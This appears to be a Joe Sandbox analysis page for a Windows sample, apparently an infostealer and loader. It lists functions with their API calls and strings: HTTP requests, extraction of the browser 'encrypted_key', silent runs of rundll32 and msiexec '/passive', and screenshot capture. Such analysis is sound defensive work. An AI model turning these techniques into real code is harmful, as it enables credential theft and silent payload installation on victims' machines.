Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 00de06af0998e8d17755f67bd159d367982bdb2b555506eea809c24e0a7bf4ca
Instruction ID: 0e06c7f413ebb0d33c1ded2786aeedfd68bb8910b782b3f4a5164f62160b9d09
Opcode Fuzzy Hash: 00de06af0998e8d17755f67bd159d367982bdb2b555506eea809c24e0a7bf4ca
Instruction Fuzzy Hash: B3E1E2B190010CABDB18EBA4DC55FEEB7B8AF14340F4441A9F60A77191DF706A4ECB65

Function 00BF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BF906C

Strings

image/jpeg, xrefs: 00BF9136

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: aaedce75fb7606c7e6b68d63bf97514df0224c5f9c2a9d907cad25cb412c9da7
Instruction ID: 1e09979b0f2341ddd66a6b5769c9a495fa80da90acf80eabb47793101bea83fe
Opcode Fuzzy Hash: aaedce75fb7606c7e6b68d63bf97514df0224c5f9c2a9d907cad25cb412c9da7
Instruction Fuzzy Hash: 8671EBB1910208AFDB18DFE5DC89FEEB7F8BB48700F148558F615A7290DB74A909CB61

Function 00BF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00BF17C5
ExitProcess.KERNEL32 ref: 00BF17D1

Strings

block, xrefs: 00BF17B7

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 56a3a333dcc82209d0f21d5ca8b0e37ed21b25e1e15b5c00ff2c3d2d888002ff
Instruction ID: c149a3fcfa3b7a6bbe3714a43cd1e53dafeeb6c410fdd3266eca5f29870fd85d
Opcode Fuzzy Hash: 56a3a333dcc82209d0f21d5ca8b0e37ed21b25e1e15b5c00ff2c3d2d888002ff
Instruction Fuzzy Hash: F3514EB4A0020DEFCB18DFA5D994BBE77F5BF44704F108898E60567240D7B0E95ADBA2

Function 00BF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

ShellExecuteEx.SHELL32(0000003C), ref: 00BF31C5
ShellExecuteEx.SHELL32(0000003C), ref: 00BF335D
ShellExecuteEx.SHELL32(0000003C), ref: 00BF34EA

Strings

/passive, xrefs: 00BF345B
.msi, xrefs: 00BF3398
.dll, xrefs: 00BF31E5
"" , xrefs: 00BF309A
C:\Windows\system32\rundll32.exe, xrefs: 00BF3332
/i ", xrefs: 00BF33E4
<, xrefs: 00BF3490
C:\Windows\system32\msiexec.exe, xrefs: 00BF34BF

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 5ad6471343ad35f5d8e8bb9c34ca32669a125c4042fd65e9926da1b50e9c6936
Instruction ID: 93a30d3bd73c6cc8b43cf58c8b5850aa2114042d98dea03722894fd9ce6a9b49
Opcode Fuzzy Hash: 5ad6471343ad35f5d8e8bb9c34ca32669a125c4042fd65e9926da1b50e9c6936
Instruction Fuzzy Hash: DE12DFB181010C9ADB19EB90DC92FFDB7B8AF14340F5081A9E60A77195EF746B4ECB52

Function 00BF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE6280: InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
Part of subcall function 00BE6280: StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE6303
Part of subcall function 00BE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
Part of subcall function 00BE6280: HttpOpenRequestA.WININET(00000000,GET,?,0173E1F8,00000000,00000000,00400100,00000000), ref: 00BE6385
Part of subcall function 00BE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
Part of subcall function 00BE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5318
lstrlen.KERNEL32(00000000), ref: 00BF532F

Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00BF5364
lstrlen.KERNEL32(00000000), ref: 00BF5383
lstrlen.KERNEL32(00000000), ref: 00BF53AE

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Strings

ERROR, xrefs: 00BF54A9
ERROR, xrefs: 00BF530A
ERROR, xrefs: 00BF5432
ERROR, xrefs: 00BF53B9
ERROR, xrefs: 00BF546F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: ddee23ff80caca15d2db8c7d0a2c9e5624dbf2123464f5197e718dafb32662fb
Instruction ID: 22bc185c494c1dc56b59b4d480b9af971d7321dccc85187265305bd64dcf4f87
Opcode Fuzzy Hash: ddee23ff80caca15d2db8c7d0a2c9e5624dbf2123464f5197e718dafb32662fb
Instruction Fuzzy Hash: A9510FB091014C9BDB18FF64C996AFD77B9AF10340F5080A4EA0A6B591DF746B4ECB62

Function 00BF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 1d74b5e68dd33d5766221cc8ba14f15b3efa4bc4738e858e02786a3f78a9f2df
Instruction ID: 4da331035680ab1534908f9cdf4c8fdc7a4539a8e8ed4d0fbd731780999f91ae
Opcode Fuzzy Hash: 1d74b5e68dd33d5766221cc8ba14f15b3efa4bc4738e858e02786a3f78a9f2df
Instruction Fuzzy Hash: D2C154B590021D9BCB18EF60DC89FFA73B8BB54304F1445E9E60AA7141DA70AA89CF91

Function 00BF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

lstrcat.KERNEL32(?,00000000), ref: 00BF42EC
lstrcat.KERNEL32(?,0173E2B8), ref: 00BF430B
lstrcat.KERNEL32(?,?), ref: 00BF431F
lstrcat.KERNEL32(?,0173CF70), ref: 00BF4333

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BF8D90: GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F

Part of subcall function 00BE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BE9D39

Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A

Part of subcall function 00BF93C0: GlobalAlloc.KERNEL32(00000000,00BF43DD,00BF43DD), ref: 00BF93D3

StrStrA.SHLWAPI(?,0173E2E8), ref: 00BF43F3
GlobalFree.KERNEL32(?), ref: 00BF4512

Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
Part of subcall function 00BE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
Part of subcall function 00BE9AC0: LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F

lstrcat.KERNEL32(?,00000000), ref: 00BF44A3
StrCmpCA.SHLWAPI(?,00C008D1), ref: 00BF44C0
lstrcat.KERNEL32(00000000,00000000), ref: 00BF44D2
lstrcat.KERNEL32(00000000,?), ref: 00BF44E5
lstrcat.KERNEL32(00000000,00C00FB8), ref: 00BF44F4

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: b22c598ac33c9f15ef565f919358228a1d0a910c3226a5f1e9173dbd9acd0403
Instruction ID: 78c7f9e677cc59a9aa268ca1e699311db978b33057694b53ba1f5723cddbebda
Opcode Fuzzy Hash: b22c598ac33c9f15ef565f919358228a1d0a910c3226a5f1e9173dbd9acd0403
Instruction Fuzzy Hash: F57117B6900208ABDB14EBA5DC49FFE73B9AB48300F0485D8F605A7181DB74DB5DCB91

Function 00BF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00BF6774
